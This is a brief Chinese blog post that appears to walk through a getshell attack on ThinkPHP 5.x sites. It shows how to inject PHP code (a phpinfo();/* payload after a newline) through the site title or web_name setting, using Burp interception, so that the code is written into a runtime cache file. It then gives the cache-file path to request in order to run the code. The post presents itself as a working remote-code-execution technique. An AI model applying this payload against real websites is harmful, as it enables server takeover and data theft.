先阅读文章:Thinkphp5.X缓存文件命名规则解析 或许才能看得懂下面内容。
修改网站标题:

通过Burp进行中间修改

phpinfo();/*

有换行,这个换行比较重要。没有他就GG。
然后去访问刷新前台。

看到标题改变后访问:

Getshell成功!
案例2
参数设置->配置管理->web_name->修改

Payload:
web_name"
phpinfo();/*
最终访问:
/runtime/cache/29/1918da8988fc177007497b63de9cc8.php

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容